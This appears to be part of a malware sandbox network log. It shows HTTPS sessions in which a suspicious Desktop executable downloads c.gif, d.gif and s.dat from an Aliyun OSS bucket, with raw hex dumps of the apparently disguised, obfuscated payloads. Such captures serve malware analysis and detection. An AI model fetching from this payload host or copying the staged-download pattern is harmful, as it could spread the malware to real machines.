2025-01-06 03:50:41 UTC	4096	IN	Data Raw: 18 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8 Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[\|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-wZbjhYklc8wP=0{y}@zvMbrqp
2025-01-06 03:50:41 UTC	4096	IN	Data Raw: 51 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf Data Ascii: QmHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9\|<d?p%~}~jJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49953	39.103.20.26	443	3916	C:\Users\user\Desktop\2749837485743-7684385786.05.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-06 03:50:42 UTC	111	OUT	GET /c.gif HTTP/1.1 User-Agent: GetData Host: hu5wd1.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-06 03:50:42 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 06 Jan 2025 03:50:42 GMT Content-Type: image/gif Content-Length: 10681 Connection: close x-oss-request-id: 677B5312E80D0139373F8B84 Accept-Ranges: bytes ETag: "10A818386411EE834D99AE6B7B68BE71" Last-Modified: Sun, 05 Jan 2025 09:00:14 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 10287299869673359293 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: EKgYOGQR7oNNma5re2i+cQ== x-oss-server-time: 22
2025-01-06 03:50:42 UTC	3550	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-06 03:50:42 UTC	4096	IN	Data Raw: 4d cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66 Data Ascii: MbZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E\|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf
2025-01-06 03:50:42 UTC	3035	IN	Data Raw: 0f 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0 Data Ascii: L]y%-/cZ<+Xd}_h48a7?79:dOtLO2/uR& PeY e@lUO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49962	39.103.20.26	443	3916	C:\Users\user\Desktop\2749837485743-7684385786.05.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-06 03:50:44 UTC	111	OUT	GET /d.gif HTTP/1.1 User-Agent: GetData Host: hu5wd1.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-06 03:50:44 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 06 Jan 2025 03:50:44 GMT Content-Type: image/gif Content-Length: 3892010 Connection: close x-oss-request-id: 677B53140BFF4B3932AC0B01 Accept-Ranges: bytes ETag: "E4E46F3980A9D799B1BD7FC408F488A3" Last-Modified: Sun, 05 Jan 2025 09:00:25 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 3363616613234190325 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 5ORvOYCp15mxvX/ECPSIow== x-oss-server-time: 5
2025-01-06 03:50:44 UTC	3550	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-06 03:50:44 UTC	4096	IN	Data Raw: 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4 6f Data Ascii: ;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>\|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V\|o
2025-01-06 03:50:44 UTC	4096	IN	Data Raw: a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f 11 Data Ascii: V(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi\|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
2025-01-06 03:50:44 UTC	4096	IN	Data Raw: 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95 97 Data Ascii: -J;wuwu{}uG`uWu{Q6
2025-01-06 03:50:44 UTC	4096	IN	Data Raw: 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33 79 Data Ascii: w#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v\|}ThkcJ{K-{u)%\|!Q;b:Bmyv)B0.xfcI9a/}pb"3y
2025-01-06 03:50:44 UTC	4096	IN	Data Raw: fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50 85 Data Ascii: eE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
2025-01-06 03:50:44 UTC	4096	IN	Data Raw: 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79 a3 Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^\|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
2025-01-06 03:50:44 UTC	4096	IN	Data Raw: 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4 af Data Ascii: e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cgOnx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M>zvGKV?oJy_y@)5f)KBzyt=U%G}}
2025-01-06 03:50:44 UTC	4096	IN	Data Raw: d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7 5f Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z_
2025-01-06 03:50:44 UTC	4096	IN	Data Raw: 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64 96 Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M\|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49988	39.103.20.26	443	3916	C:\Users\user\Desktop\2749837485743-7684385786.05.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-06 03:50:52 UTC	111	OUT	GET /s.dat HTTP/1.1 User-Agent: GetData Host: hu5wd1.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-06 03:50:52 UTC	561	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 06 Jan 2025 03:50:52 GMT Content-Type: application/octet-stream Content-Length: 28272 Connection: close x-oss-request-id: 677B531CDCC23B3432E801EC Accept-Ranges: bytes ETag: "118BC88C54125F7AD49C190766A982DD" Last-Modified: Mon, 06 Jan 2025 03:50:50 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 15066663303643123465 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: EYvIjFQSX3rUnBkHZqmC3Q== x-oss-server-time: 12
2025-01-06 03:50:52 UTC	3535	IN	Data Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40 Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
2025-01-06 03:50:52 UTC	4096	IN	Data Raw: 23 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 Data Ascii: #_##V'3+f~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
2025-01-06 03:50:52 UTC	4096	IN	Data Raw: 8e 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 Data Ascii: 